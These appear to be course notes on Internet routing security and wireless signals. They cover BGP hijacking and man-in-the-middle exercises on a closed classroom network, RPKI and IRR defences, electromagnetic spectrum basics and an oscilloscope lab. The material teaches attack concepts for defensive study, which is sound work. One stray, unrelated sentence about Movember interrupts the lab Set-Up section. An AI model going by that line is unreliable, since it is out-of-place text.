   c. The range of IP addresses assigned to a network.
   d. All of the above.
2. As an Autonomous System (AS), what is the difference between originating an IP prefix and being allocated an IP prefix?
3. What are Border Gateway Protocol (BGP) route attributes and what are they used for in BGP?
4. What defines the nature of Internet routing?
5. Two types of attacks were discussed in Chapter 18: 1) route hijacking and 2) the routed wide area MITM attack. What is the difference in how BGP is exploited in each attack?
6. What information is required to secure Internet routing?
7. What is the most current ideal solution to secure Internet routing?
8. Who is responsible for implementing the technical solutions to secure Internet routing proposed in Chapter 18?
9. What makes securing the Internet routing so difficult today and in the future?
10. Filtering was mentioned as one of the technical solutions to a routed wide area Man-In-The-Middle (MITM) attack. What is one negative consequence of filtering?
11. What must be true for filtering to be effective in securing Internet routing?
12. Why is filtering so difficult to implement and maintain?
13. How is RPKI different than the Internet Routing Registries (IRRs)?
14. RPKI was proposed as one technical solution to secure Internet routing. It uses cryptography to provide assurance of the association between:
   1) ________________________________ and _____________________________________
   2) ________________________________ and _____________________________________
15. What tool does RPKI provide to attest to what ASNs can originate which IP prefixes?
16. Even if using filtering, the IRRs, and RPKI, what aspect of BGP is still vulnerable to manipulation?
17. What is the fundamental principle of communication as it relates to security?
18. What IP prefix and AS path should Router 50 announce to hijack the Midtrest webserver?
19. Consider the network diagram and BGP route announcement from Router 50 of AS50 below. AS10 is a multihomed AS. Assuming no local preferences are set, for every AS, draw the path that AS would select to reach 30.31.51.10 beginning with the AS router and ending with the Midtrest webserver.
[Network diagram for Problem 19: AS 10 (R10), AS 20 (R20), AS 30 (R30), AS 40 (R40, www.midtrest.com at 30.31.51.10, prefix 30.31.32.0/19), AS 50 (R50) and AS 70 (R70), joined by /30 links (1.1.1.0/30, 2.2.2.0/30, 3.3.3.0/30, 4.4.4.0/30, 5.5.5.0/30, 7.7.7.0/30, 8.8.8.0/30, 9.9.9.0/30, 10.10.10.0/30); the prefix 1.2.3.0/24 also appears. Announcements shown: Network: 30.31.48.0/20, AS-Path: 50-70-40 (from Router 50); Network: 30.31.32.0/19, AS-Path: 40.]
Security Exercise 18
Part 1: Initial Setup
Now that we understand how the Internet is put together, let’s take a closer
look at how it can be pulled apart.
1. Set-Up
Yes, I take Movember very seriously, and if you seriously want to be an Astronaut, you should know who I am and what I do now. Remember, ’68 is great!
Equipment needed:
• A printed or electronic copy of this security exercise.
  o If printed, separate the network diagram and answer sheet at the back of this exercise and have them ready to fill in.
• Your issued Laptop.
  o Ensure Chrome or Firefox is installed on your Windows computer.
  o Turn up the volume on your computer.
  o Turn off the wireless adapter.
  o Connect the blue Ethernet cable at your desk to your issued laptop.
  o Wait for an IP address to be assigned to your LAN interface.
  o Verify by pressing the Windows Orb key and, in the program search bar, typing cmd. Hit enter to launch the Windows terminal and then, at the command prompt, execute ipconfig.
Now, your screen should look similar to the figure below. Your Ethernet adapter should be assigned an IP
address of 192.168.XX.YYY, where XX is your classroom number and YYY is a number between 101
and 254. If not, notify your instructor or lab technician.
Part 2: We Want MidTube!
1. MidTube is Back!
When we last left off in SX#17, MidTube had been shut down by the Professional Teaching Association (PTA) at the request
of Prof. Evil. This ban would not be lifted until a thorough review of the Rectabular Excrusion Bracket was accomplished
by all EC310 midshipmen. To pull off their block, the PTA advertised a more specific network prefix which contained the
address of the MidTube webserver. This forced all traffic destined for MidTube across the EC310 internet to be redirected to
AS2003. As you just learned in lecture, this type of attack is commonly referred to as prefix hijacking.
Question 1: What feature about BGP makes it possible for the PTA to hijack MidTube?
Question 2: What is required to secure Internet routing from prefix hijacking?
Have no fear. The Superintendent heard word from the Brigade of Prof. Evil’s heartless actions. In fact, several bitter, angry
midshipmen stormed his office over the weekend to complain; and, as you well know, if there is one thing we cannot have
at the Naval Academy it is cynical midshipmen. Therefore, the Superintendent quickly took action and directed Prof. Evil to
restore MidTube immediately or face disciplinary action. Thwarted yet again, Prof. Evil reluctantly agreed and contacted the
PTA to remove the block. Now, once again, for your viewing pleasure, visit http://www.midtube.com.
• Access the website www.midtube.com by opening Firefox or Chrome on your Windows computer (i.e., not your Cyber2 VM) and navigating to the website address.
• Log in by creating a username and password of your choice (do not use a username or password you would not like exposed).
• Browse the website to see what information is available.
Question 3: Gasp… what shocking event just happened?
Question 4: Perform a tracert (do not forget the –d option) to the MidTube webserver. List the IP addresses in the order
they appear on your answer sheet. Is this the correct route to the MidTube webserver?
2. The PTA’s Back!
It seems Prof. Evil and the PTA are back to their old tricks again! This time, rather than simply shut down MidTube, they
were able to place themselves in between you and the MidTube webserver. From that vantage point they could observe all
traffic destined for 17.17.200.0/24 and identify those who were enjoying themselves rather than paying attention in
class. To do this, the PTA made the following announcement from Router 3 in AS2003:
Question 5: Assuming no local preferences are set and for every AS in the EC310 internet, on your network diagram draw
the path each AS would select to reach 17.17.200.2 beginning from the AS router and ending with the MidTube
webserver.
The correct answer to Question 5 will be explained in detail by your instructor, but the astute midshipman may realize that the
PTA’s actions only redirect traffic in the forward direction. That is, traffic leaving AS2016 destined for the MidTube
webserver would be forced through AS2003, but traffic leaving AS2005 destined for AS2016 would not be forced through
AS2003. The MidTube webserver will respond to all web requests via a separate path chosen by Router 5 of AS2005.
Question 6 (Extra Credit): What announcement(s) should the PTA use in order to become the MITM in the reverse
direction? (Hint: Consider the Initial Setup instructions of Security Exercise 17 and 18)
3. Disconnect from the EC310 Internet
• Close all tabs in Chrome or Firefox.
• Disconnect the blue Ethernet cable.
• Turn on your wireless adapter.
STOP! We’ll now return to your regularly scheduled lecture.
Part 3: The Real Internet
While it is fun playing around in the EC310 internet, it is not enough to see all the parts and pieces that make the real Internet
work. Let’s get to know some of the organizations we mentioned in lecture that are responsible for the safe and effective
operation of the real Internet. Let’s also take a closer look at the solutions available to secure Internet routing.
1. Internet Routing Registries
Recall from Chapter 18 the Internet Routing Registries (IRRs) house important information about the IP prefixes, ASNs,
routing policy, network topology and human points of contact of registered ASes.
• Access the website www.irr.net in either Firefox or Chrome on your Windows computer (i.e., not your Cyber2 VM) via the USNA network (i.e., not the EC310 internet).
• Click the link for an ‘Overview of the IRR’
Question 7: What do the IRRs provide?
Question 8: When did they come about?
• Click the link for a ‘List of Routing Registries’
Question 9: How many routing registries are there?
• Click the link for ‘FAQ: Why Use a Routing Registry?’
• Read the first email shown from oberman@es.net
Question 10: Why use a routing registry?
Question 11: Do people trust the information in the IRR? When is this a problem?
2. Regional Internet Registries and Resource Public Key Infrastructure
One of the most effective solutions against false route injection into the Internet routing system is the use of Resource Public
Key Infrastructure (RPKI). Just within the last few years, all Regional Internet Registries (RIRs) began offering RPKI.
• Access the website https://www.arin.net/resources/rpki/index.html in either Firefox or Chrome on your Windows computer.
• Watch the video ‘Resource Certification Explained’ to learn more about how RPKI works.
Question 12: In RPKI, what is used to verify that an IP address has been allocated to a specific entity?
Question 13: In RPKI, what is used to verify that an AS may originate a specific network prefix?
Question 14: What is one thing RPKI does not provide assurance of?
Question 15: What must AS network operators do with the data from RPKI to secure Internet routing?
STOP! We’ll now complete your regularly scheduled lecture.
Security Exercise 18 Answer Sheet
Name:
Question 1:
Question 2:
Question 3:
Question 4:
Question 5:
Question 6 (Extra Credit):
Question 7:
Question 8:
Question 9:
Question 10:
Question 11:
Question 12:
Question 13:
Question 14:
Question 15:
[Network diagram, EC310 Security Exercise 17 & 18 answer sheet: AS 2016 (R16, RA, RC, Other USNA Networks, 2.2.2.0/29), AS 20 (R20), AS 30 (R30), AS 40 (R40), AS 50 (R50), AS 60 (R60), AS 2003 (R3, www.pta.net at 21.200.3.2, prefix 21.200.3.0/24) and AS 2005 (R5, www.midtube.com at 17.17.200.2, prefix 17.17.200.0/24), joined by point-to-point links (3.3.3.0/30, 4.4.4.0/24, 7.7.7.0/30, 8.8.8.0/30, 9.9.9.0/30, 12.12.12.0/30, 13.13.13.0/30, 14.14.14.0/30, 15.15.15.0/30, 16.16.16.0/30, 18.18.18.0/30, 19.19.19.0/30, 20.20.20.0/30) with .1/.2 host addresses; one link is labelled ?.?.?.?/??. Announcements shown: Network: 17.17.200.0/24, AS-Path: 2005; Network: 21.200.3.0/24, AS-Path: 2003. Blank boxes (a), (b), (c), marked “SX18 ONLY”, are to be filled in as Network: _____._____._____._____ /____ and AS-Path: _________________________.]
Part III: Wireless
In this, the final module of the course, you will be introduced to how digital information, in the form of
bits, is moved from one location to another through free space, that is, without using wires or cables.
However, while the ability to move information through free space makes communication more
convenient, it also makes communication more susceptible to eavesdropping or jamming. Therefore, we
will also explore the vulnerabilities of wireless communication.
Chapter 19: Communications Systems, EM Spectrum, and Signals
Objectives:
(a) Describe the four components of a communications system and the impact on security of using free space as a
communication medium.
(b) Identify communication applications for various bands of the electromagnetic spectrum ranging from extremely low
frequency (ELF) to extremely high frequency (EHF).
(c) Define the term signal and explain the basic properties of a sinusoidal electromagnetic signal (period, frequency,
wavelength, phase, and amplitude) and describe their mathematical relationship.
(d) Plot simple (sinusoidal) electromagnetic signals in the time and frequency domains; interpret time- and frequency-domain
plots to determine the associated signals.
(e) Define and calculate bandwidth of transmitted signals.
Connection to Cyber Security
This chapter marks the beginning of the third part of EC310. In Part I: The Host, we examined how data are stored and
accessed in memory at the machine level and examined the resulting threats against a specific computer, focusing on the
buffer overflow attack. In Part II: Networks, we concentrated on understanding how the Internet works and how networks are
just as important and vulnerable as the individual host computers that reside on them. In Part III: Wireless, we will gain an
appreciation for communicating in an environment without physical connections to every computer, router, etc. in the
network, leading up to how wireless communication systems can be hacked.
(Graphic by Dane Brown)
I. Communications Systems and the Electromagnetic Spectrum
A. Communication Systems
The purpose of a communications system is to transmit information over a distance. This “information” could be audio (such
as speech or music), video, sensor data (temperature, pressure), or other data (e.g., text, stock prices, photos, etc.). “Over a
distance” may mean from here to the other side of the world via a satellite, or from one computer to another in a network, or
from your computer’s CPU to its RAM.
Any communications system consists of the following basic components, which are shown in the following figure. There are
four main components:
• Transmitter – converts information into an electronic form suitable for the channel
• Channel – the physical medium through which an electronic signal travels
  o e.g., wire, fiber-optic cable, free space (i.e., air), water (sonar)
• Receiver – converts the received signal back to a usable form
• Noise – undesired, random corrupting energy
The information is passed to the transmitter. The receiver produces a “recovered” information signal, which may not be the
same signal that was transmitted. This is because a significant, though undesired, occurrence in all communication systems is
noise, which is random energy that enters the system and interferes with (corrupts) the transmitted message. If the noise is
strong enough, the information signal may not get through at all. You’ve all heard what noise sounds like, for example on a
telephone (we sometimes refer to it as static). If the static is very powerful you will only hear a small portion (or none) of the
words that are spoken to you. This relationship between the useful signal and corrupting noise will be formalized in chapter
23.
Noise can be divided into two broad categories:
• External noise is noise introduced into the transmission channel from outside sources. Examples include:
  o Industrial noise arising from man-made electrical sources (e.g., motors, generators, switches)
  o Atmospheric noise due to naturally occurring disturbances in earth’s atmosphere (e.g., lightning)
  o Extraterrestrial noise due to solar and cosmic activity.
• Internal noise is noise introduced by the electronics inside the receiver itself. Examples include:
  o Thermal noise
  o Semiconductor noise
For the third block of this course, we will focus on communications systems in which our channel or medium is free space.
Free space can refer to a perfect vacuum (as you might recall from physics), or to the air (as opposed to transmission through
a wire or other material). Signals that propagate in free space are often referred to as “wireless” or “over-the-air” signals, and
all signals in free space are part of the electromagnetic spectrum. With wireless routers and satellites part of almost every
network, especially in military applications, understanding the electromagnetic spectrum is critical to cyber security.
B. Electromagnetic Spectrum
The electromagnetic spectrum is the range of all possible frequencies of electromagnetic waves. The spectrum is broken into
regions/ranges and classified by frequency and/or wavelength. The frequency (f ) of an electromagnetic wave is a measure of
how rapidly it oscillates. Frequency is measured in Hertz (1 Hz = 1 cycle/sec).
The period (T) of an electromagnetic wave is the length of time required to complete one cycle. The period is measured in
seconds, and is the reciprocal of the frequency in Hz (T = 1/f). Wavelength (λ) is the physical distance between the peaks of
one cycle of a transmitted wave as it moves through the medium, and is measured in meters (m). The following plots show an
EM wave’s voltage as a function of time (left plot), and as a function of distance (right plot).
For electromagnetic waves traveling in air (or vacuum), we will assume that they travel at the speed of light (c),
which is roughly 3 × 10^8 m/s. The wavelength is inversely proportional to the frequency, and is related to the speed of light
by:
λ = c / f .
The specific bands of frequencies in the EM spectrum are shown in the following figure. In this course, we are concerned with
communications in the frequency ranges from ELF to EHF.
Later in the course, you will see that antennas are needed to transmit information using the EM spectrum. The following
figure should give you an idea of the relationship between wavelength size (which will determine antenna size) and
transmission frequency throughout the Electromagnetic Spectrum.
You should be familiar with the frequency ranges for communications from ELF to EHF.
• Extremely low frequency (ELF) 30 Hz to 300 Hz. Power line frequencies and low end of human audio.
• Voice frequency (VF) 300 Hz to 3000 Hz. Typical range associated with human voice.
• Very low frequency (VLF) 3 kHz to 30 kHz. Used for communications with submerged submarines.
• Low frequency (LF) 30 kHz to 300 kHz. Long range radio navigation.
• Medium frequency (MF) 300 kHz to 3000 kHz. AM radio and long range communication.
• High frequency (HF) 3 MHz to 30 MHz. Known as “short wave”, used by two-way radio.
• Very high frequency (VHF) 30 MHz to 300 MHz. Radio communications and FM radio.
• Ultra high frequency (UHF) 300 MHz to 3000 MHz. TV, military and cell phones.
• Super high frequency (SHF) 3 GHz to 30 GHz. Microwave. Satellite communications and radar.
• Extremely high frequency (EHF) 30 GHz to 300 GHz. Satellite communications.
Practice Problem 19.1
What is the wavelength of an FM radio station whose broadcast frequency is 101.1 MHz?
Practice Problem 19.2
What is the frequency of a signal whose wavelength is 8 cm?
Bandwidth
Bandwidth is the amount of the frequency spectrum occupied by a signal, regardless of where it is in the
spectrum. It is the difference between the upper and lower frequency limits of the signal. Typical bandwidths:
• AM Radio Station – 10 kHz
• FM Radio Station – 180 kHz
• Broadcast TV Station – 6 MHz
If a signal occupies the range of frequencies between approximately 300 Hz and 3000 Hz, its bandwidth is 2700 Hz, as the
following figure demonstrates.
Federal Communications Commission (FCC)
The electromagnetic spectrum is crowded; everyone wants some bandwidth. The FCC was established by the
Communications Act of 1934 to regulate interstate and foreign communication. The FCC:
• Allocates bands of frequencies for specific uses
• Sets limitations on broadcast power
• Monitors broadcasts to detect unlicensed operations and technical violations
• Auctions spectrum usage
The FCC controls which portions of the EM spectrum are used for various purposes (e.g. FM radio, AM radio, broadcast TV,
satellite communications). The FCC also makes sure that transmissions do not interfere with each other (two transmitters
physically close to each other transmitting in the same frequency range can destroy each other’s signals). For example,
Washington D.C. can have an FM station that transmits at 101.1 MHz (the FM station called FM101), but Baltimore cannot
have an FM station that transmits at 101.1 MHz because it is too close to the Washington D.C. station (approximately 35
miles away).
Because the spectrum is a non-renewable resource in a society that is increasingly connected, it is incredibly precious. To give
you an idea of its value, 400 MHz of spectrum was auctioned by the FCC in 2015 and sold for $44.9 billion!
II. Signals as a Function of Time and Frequency
Recall that the purpose of a communications system is to transmit information over a distance. The block diagram for a
communication system is again shown below.
Thus far, we’ve covered that during the final section of this course we’re going to focus on free space as our channel or
medium, which means we’re considering the electromagnetic spectrum. Why do we care?
Information can be in various forms. We transmit information in the form of a signal.
A. Signals
A signal is a function that conveys information. Signals are considered either analog or digital.
Analog Signals
An analog time-signal is one that is defined along a continuum of times and amplitudes. For example, the
continuous changes in air pressure produced by a vibrating vocal cord or guitar string are examples of analog voice
and music signals, respectively. An analog signal can take on an infinite number of values between a maximum and
a minimum level; that is, the values are from a continuum. Some examples of analog signals are shown below.
Digital Signals
A digital time-signal, in contrast, is one that is defined for only discrete values of time and amplitude. Digital signals
change in discrete increments and can be used to represent binary information, such as that used by computers.
Although this is its strict definition, the term “digital signal” is also often used to refer to continuous-time signals
that can take on only a fixed set of states or amplitude values. We will adopt this usage frequently in EC310, and
these are the types of digital signals shown in the figure below. Digital signals will be covered in more detail in
Chapters 21-22.
A simple example of a signal, widely used in both analog and digital communications is a tuning
fork (that is, the sound it produces is its signal).
You can hear the tuning fork, but if you were to look at it graphically as a function of air pressure
over time, you would see something that looks like this, which is a sine wave at a frequency of
440 Hz.
[Figure: the 440 Hz tuning-fork sine wave, Voltage (V) from -0.15 to 0.15 versus Time (sec) from 0 to 0.025]
B. Time Domain (Sine Wave)
Earlier in this chapter, we discussed some basic properties of sinusoidal (electromagnetic) waves. A sinusoidal voltage
waveform can be expressed mathematically in the following way:
v_m(t) = V_m sin(2π f_m t + θ),   where f_m = 1 / T_m
Amplitude (V_m) – distance from average to peak (in volts)
Period (T_m) – time to complete one cycle (in seconds)
Frequency (f_m) – number of cycles in one second (in Hz)
Phase (θ) – left/right shift with respect to the t = 0 axis (in radians)
The sine wave is one way to represent the sound the tuning fork makes as a function of time. This is referred to as its “time
domain” representation. If the amplitude of the signal is 2 Volts, then the equation for the tuning fork signal would be:
v_m(t) = 2 sin(2π·440t) .
This signal can also be represented in terms of its frequency content (i.e., which frequencies are present in the signal) in the
“frequency domain.”
C. Frequency Domain (Frequency Spectrum)
To display a signal in the frequency domain, we determine the frequency content of the signal (in general this is done using
Fourier theory; in this class, since the signals we analyze are composed of sinusoids, it can be done by inspection).
The frequency content is then displayed on a plot of magnitude vs. frequency (magnitude is the absolute value of amplitude).
Since our tuning fork is a very simple tone with a single frequency component of 440 Hz and an amplitude of 2V, the
frequency domain plot looks like this:
Both the time-domain (sine wave) and the frequency-domain displays represent the important characteristics of the tuning
fork as far as a communication system is concerned– they’re just different ways to express the same signal. For
communication engineers, the primary interest is what portion of the frequency spectrum does the signal occupy and how
strong is the signal (magnitude); for our purposes, phase offset (if present) is not part of the frequency plot.
Suppose we had a slightly more complicated signal. Suppose
v_m(t) = 2 sin(2π·440t) − 3 sin(2π·900t + π/4) + 5 cos(2π·1100t − 2π/7) .
In this case, there are three sinusoids (i.e., there are three frequencies in the
signal) so the frequency plot will have three spikes, at the three frequencies
given, with heights corresponding to the magnitudes of the amplitudes given.
Again, the phases shown are not a part of this plot.
Part of the benefit of a frequency domain representation is that certain signal
attributes, like bandwidth, are easy to visualize. For instance, in the above
graph, you can quickly see the bandwidth is 1100 Hz – 440 Hz = 660 Hz.
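As an added example, not from the original notes, the Python below reads the frequency-domain plot straight off the three-term equation above, computes its bandwidth, and then cross-checks the by-inspection answer with a standard-library DFT of the sampled signal. The sampling rate (4400 Hz) and window (0.25 s) are constructed so that every tone falls exactly on a DFT bin.

```python
import math
import cmath

# Sinusoid terms as (amplitude, frequency_hz, phase_rad, kind), kind "sin" or "cos".
# Constructed from the chapter's equation:
#   v_m(t) = 2 sin(2π·440t) − 3 sin(2π·900t + π/4) + 5 cos(2π·1100t − 2π/7)
SIGNAL = [
    (2.0, 440.0, 0.0, "sin"),
    (-3.0, 900.0, math.pi / 4, "sin"),
    (5.0, 1100.0, -2 * math.pi / 7, "cos"),
]


def spectrum_by_inspection(terms):
    """Frequency-domain plot read off the equation: {frequency_hz: magnitude}.
    Magnitude is |amplitude|; sign, phase and sin-vs-cos do not appear on the plot.
    Assumes each frequency occurs in only one term."""
    return {freq: abs(amp) for amp, freq, _phase, _kind in terms}


def bandwidth_hz(spectrum):
    """Bandwidth = highest frequency present minus lowest frequency present."""
    return max(spectrum) - min(spectrum)


def sample(terms, t):
    """Time-domain value v_m(t) of the sum of sinusoids at time t (seconds)."""
    total = 0.0
    for amp, freq, phase, kind in terms:
        arg = 2 * math.pi * freq * t + phase
        total += amp * (math.sin(arg) if kind == "sin" else math.cos(arg))
    return total


def spectrum_by_dft(terms, fs=4400.0, duration=0.25, threshold=0.1):
    """Fourier cross-check of the by-inspection plot: sample the signal, take a
    plain O(N^2) DFT, and report single-sided magnitudes above `threshold`.
    When f * duration is an integer for every tone, each lands exactly on a bin,
    so there is no leakage and the 2/N scaling returns the exact amplitudes."""
    n = int(round(fs * duration))
    samples = [sample(terms, k / fs) for k in range(n)]
    found = {}
    for k in range(1, n // 2):  # skip DC and Nyquist bins, whose scaling differs
        x = sum(s * cmath.exp(-2j * math.pi * k * i / n) for i, s in enumerate(samples))
        magnitude = 2.0 * abs(x) / n
        if magnitude > threshold:
            found[k * fs / n] = round(magnitude, 2)
    return found


if __name__ == "__main__":
    by_eye = spectrum_by_inspection(SIGNAL)
    print("by inspection:", by_eye, "bandwidth:", bandwidth_hz(by_eye), "Hz")
    print("by DFT:       ", spectrum_by_dft(SIGNAL))
```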
Problems
1. What is the purpose of a communications system? Draw and explain the components.
2. What part of the electromagnetic spectrum (frequency range) is visible to humans?
3. Find 5 major uses of the UHF band (use a book or the Internet to find your answer).
4. Calculate the frequency of signals with the following wavelengths:
   a. 30 m
   b. 2 km
   c. 8 cm
5. AM Radio
   a. What is the frequency range used by AM radio broadcast stations?
   b. What is the bandwidth (BW) occupied by each station?
6. Given the sine wave below, answer the following questions:
   [Figure: sine wave plot, Amplitude (V) from -4 to 4 versus time (msec) from 0 to 0.15]
   a. What is the period of this signal?
   b. What is this signal’s amplitude?
   c. What is the frequency of this signal?
   d. In which range of the electromagnetic spectrum would this signal be classified?
   e. What is the wavelength of this signal?
   f. Sketch this signal in the frequency domain.
7. Given the following equation for a signal, sketch the frequency plot. Put your frequency axis in kHz.
   v_m(t) = −18 sin(2π·44,000t) + 13 sin(2π·150×10^3 t − 6π/11) + 7 cos(2π·30×10^4 t + π/21)
8. Given the following plot, write the equation for one signal that has this as its frequency plot (note: there is not one single answer).
Security Exercise 19
Introduction to Signals in the Time and Frequency Domains
PART I: INTRODUCTION & SINUSOIDAL SIGNALS
Check-off each step as you complete it.
Step One: Function generator setup.
□ Turn on power to the lab bench. The power switch is on the right side of the lab bench and is labeled "120 V
OUTLETS." The switch should be in the raised position if power is on.
□ Locate the "10MHz Function/Arbitrary Waveform Generator" on the lab bench and turn the power on. We will refer to
this equipment as simply the "function generator."
□ Select the sinusoidal function by pressing the button with the Sine wave on it. The function generator display should
indicate a small sine wave.
□ Turn any other lit buttons off.
As the name implies, the function generator is able to generate electrical signals. For this lab we will use the function
generator to generate sinusoidal voltage waveforms.
We will set the frequency to 1.75 kHz using the key pad method.
□ Select the Frequency (Freq) function using the soft keys under the display screen.
□ Enter the desired frequency (1.75) using the key pad.
□ Enter the desired units (kHz) by pressing the button under kHz on the screen.
We will set the size of the waveform to 10 Vpp (volts peak-to-peak) using the key
pad method.
□ Select the Utility function and then select the Output Setup soft key. Check that High Z is highlighted. If not, push the
Load/High Z button until it is highlighted. Push Done.
□ Select the Amplitude (Ampl) function using the soft keys under the display screen.
□ Enter the desired amplitude (10) using the key pad.
□ Enter the desired units (Vpp) by pressing the button under Vpp on the screen.
□ Press the output button. It should now be lit indicating the function generator is producing an output.
Right now your function generator is generating a 1.75 kHz signal that has a peak-to-peak voltage of 10V. But…that signal
is not leaving the function generator. To see the signal, we will send the output of the function generator to an oscilloscope.
Proceed to Step Two!
Step Two: Oscilloscope familiarization.
□ Locate the oscilloscope at the top of your lab bench and turn its power on. The power push button is located on the
top left of the oscilloscope.
The oscilloscope can receive electrical signals from two probes, channel 1 (CH 1)
and channel 2 (CH 2). We have attached adaptors to CH 1 and CH 2, so that they
can receive electrical signals via our banana plug cables.
□ Locate the CH 1 input on your oscilloscope. It will have a two-input (RED / BLACK) banana plug adaptor installed.
□ Connect banana plug cables (which can be found under the bench on the plastic Quad board) from the function
generator’s output to the CH 1 input on the oscilloscope (connect red-to-red and black-to-black).
The oscilloscope has the ability to measure and display two different electrical signals, but only with respect to one common
reference point. The BLACK CH 1 input provides this common reference point (ground) for both CH 1 and CH 2.
Therefore, CH2 has an adaptor for only one banana plug. We will not be using CH2 for this lab.
Before looking at our sine wave on the scope in detail, let's first pause and look at a generic display which explains how the
information on the oscilloscope screen is presented. Your screen will not look like the screen shown in Figure 1 below!
In the figure below, we see that the oscilloscope display is divided up into eight major vertical divisions. The bottom left
corner of the oscilloscope—where you see "CH1 100mV"—indicates the number of volts per division for a given channel.
You can see that CH 1 and CH 2 indicate 100mV per division, therefore each major division in the vertical axis represents
100mV.
Similarly there are ten major divisions on the horizontal axis that represent time. Each major division on the horizontal axis
of the display represents 250μs. CH1 and CH 2 can have different Volts/Div, but will always share the same Sec/Div.
Step Three: Display your sine wave with the oscilloscope.
□ Press the AUTOSET button (top right) on the oscilloscope. AUTOSET will measure the input signals for the channels
selected and attempt to display something meaningful.
□ With the CH 1 menu selected, adjust the position of the vertical axis zero level by rotating the vertical position knob
in the CH 1 column, so that the “1→” on the left side of the display is adjacent to the major horizontal axis (centered
vertically on the display).
□ If needed, press the CH2 Menu button twice to turn off the CH 2 trace, since nothing is connected to CH 2 for this lab
(CH 2 is displaying background noise).
□ Press CH 1 MENU on the oscilloscope and make the following settings.
   • Coupling: AC
   • BW Limit: OFF
   • Volts/Div: COARSE
   • Probe: 1X
   • Invert: Off
□ Adjust the VOLTS/DIV knob under the vertical section in the CH 1 column, so that CH 1 indicates 2 Volts/Div on the
bottom left corner of your display.
□ Adjust the SEC/DIV knob under the horizontal axis, so that the oscilloscope indicates 100 μs per major division on the
LCD on the bottom middle of your display.
Step Four: Measuring the waveform on the oscilloscope.
Manual method. The first method is by counting the divisions
of grid and applying the scale (volts/div for vertical, or sec/div
for horizontal). This will only provide you with approximate values with little precision.
Question 1. Fill out the table on your answer sheet using this manual measurements method. Specifically:
□ Using the vertical scale, determine the peak-to-peak voltage on CH1 which is the total voltage from positive peak to
negative peak. That is, you should count the number of vertical divisions from peak to peak, and multiply the
number of divisions by the number of volts/division.
□ From your measured Vpp, determine the amplitude of the signal (Vm).
□ Using the horizontal scale, determine the period (Tm) and then calculate the signal's frequency. That is, you should
count the number of horizontal divisions for one full cycle, and then multiply the number of divisions by the number
of microseconds (in this case) per division.
Taking measurements with cursors. The oscilloscope has time and amplitude cursors that you can move on the plot to help
take measurements of voltage, period and frequency.
□ Press the Cursor button (top middle) to view the cursor menu on LCD.
□ Then choose the Type of cursor to be Amplitude by cycling through the options on the button associated with this
menu option. Two horizontal cursors will now appear that are moveable.
□ Choose the Source to be CH 1. Two cursors are now available for you to move around the display. Push Cursor 1 to
move the first cursor, and Cursor 2 when you want to move the second cursor. The cursors are moved using the
large knob next to the green power-on light.
□ Place cursor 1 at the sinusoid’s maximum voltage, and cursor 2 at its minimum. The ΔV value (which is the voltage
difference between the two cursors) can be read out on the right side of the display…this is the peak-to-peak
voltage.
□ Then choose the Type of cursor to be Time by cycling through the options on the button associated with this menu
option. Two vertical cursors will now appear that are moveable.
□ Adjust the two time cursors to allow you to measure the period of the sinusoid.
Question 2. Fill out the table on your answer sheet using the cursor measurements method.
Taking automatic measurements. The oscilloscope has the ability to take automated measurements of voltage, period and
frequency.
□ Press the Measure button (top middle) to view the measurement menu on LCD, then push the top menu box button
to highlight Source and select CH1 for Measure 1.
□ Then choose the Type of measurement to be Pk-Pk by cycling through the options on the button associated with
this menu option, and then hit the button for the Back option.
□ Press the second to top menu box button to select Measure 2.
□ Then choose the Type of measurement to be Freq by cycling through the options on the button associated with this
menu option, and then hit the button for the Back option.
□ You can add new measurements for all 5 buttons. Amplitude is not automatically measured but can still be
calculated from the peak-to-peak voltage as before. Record your results in Question 2.
Question 3. Fill out the table on your answer sheet using the automatic measurements method.
Consider how you would describe your sinusoidal signal as an equation.
The phase describes the start of one signal relative to another, so we will assume the phase is zero.
Question 4. The equation for a sine wave is $v_m(t) = V_m\sin(2\pi f_m t + \theta)$. Write your equation for the sinusoid based on your
measurements from the previous pages.
Step Five: Measuring a pure sine wave in the frequency domain.
Our scope can also provide a frequency spectrum of a signal. For this particular sinusoidal signal we know it is periodic and
has a single frequency, fm, described by the previous measurements and shown in our equation.
Now let us see how this signal is displayed in the frequency domain.
The oscilloscope performs a Fast Fourier Transform (FFT) and displays the magnitudes of the frequencies present in the
signal vs. frequency, so the horizontal scale shows frequency (in Hz) instead of time.
□ Press AUTOSET (top right) and you will see the options to display the signal in time or in frequency (FFT).
□ Push the button next to the FFT and you will see a spike at a particular frequency.
□ Set the horizontal scale to read 250Hz per division by turning the Sec/Div knob.
At this point, you should see one large spike in the display (which corresponds to the sinusoidal signal from CH1, and also
many smaller spikes scattered throughout the frequency spectrum (this is noise). Your concern is the large spike.
Question 5. The left edge of the display is 0 Hz, and frequency increases from 0 Hz as you move to the right. Determine the
value of the frequency component (fm = ?) by counting the number of horizontal divisions and multiplying that by the number
of Hz per division.
You can check your answer using the frequency cursor:
□ Press the Cursor button (top middle) to view the cursor menu on LCD.
□ Choose the Source to be MATH (note: this is because the FFT is a mathematical computation).
□ Then choose the Type of cursor to be Frequency. Two vertical cursors are now available for you to move around
the display. Push Cursor 1 to move that cursor, and place it on the largest spike. The readout of frequency will be
displayed on the right side of the LCD.
Question 6. Sketch your frequency plot (as seen on the oscilloscope) and label the axes with your values. Include the smaller
noise spikes. Have your instructor check it. Note: this oscilloscope displays amplitude of the frequency content in decibels
(dB) vice volts, as you have been taught. The default vertical scale is 10 dB per vertical division, and the bottom of the scale
is 0 dB, so label the vertical axis accordingly. Use the Amplitude cursor on the FFT plot to determine the heights of the
spike.
PART II: PUTTING YOU TO THE TEST—UNKNOWN SIGNALS
So…are you comfortable using the function generator and the oscilloscope? Let's find out!
Your instructors have pre-set two different sinusoidal signals into the function generator. Your goal is to determine the
amplitude and frequency of each.
□ Reset the Oscilloscope back to the time domain from the frequency domain, by pressing the Autoset button and then
selecting the button next to the multiple cycles of a sinewave (at the top, above the FFT button). (If the pesky
Channel 2 display is active, hit CH2 Menu twice.)
□ Ask your Instructor/Lab Tech to enter Challenge Signal 1. You will find this challenging because it is named
"Challenge Signal 1."
□ Push AUTOSET on the Oscilloscope.
Determine the amplitude and frequency of the sine wave. Obviously you should use only the oscilloscope (do not try to
finagle with the function generator, pushing various buttons to see if it will cough up the answer!) Use only the oscilloscope!
Place your answers in Question 7. Show your instructor or lab tech before continuing.
□ Ask your Instructor/Lab Tech to enter Challenge Signal 2. You will find this challenging because…well…you know.
□ Push AUTOSET on the Oscilloscope.
Determine the amplitude and frequency of the sine wave. Use only the oscilloscope!
Place your answers in Question 8. Show your instructor or lab tech before calling it a day.
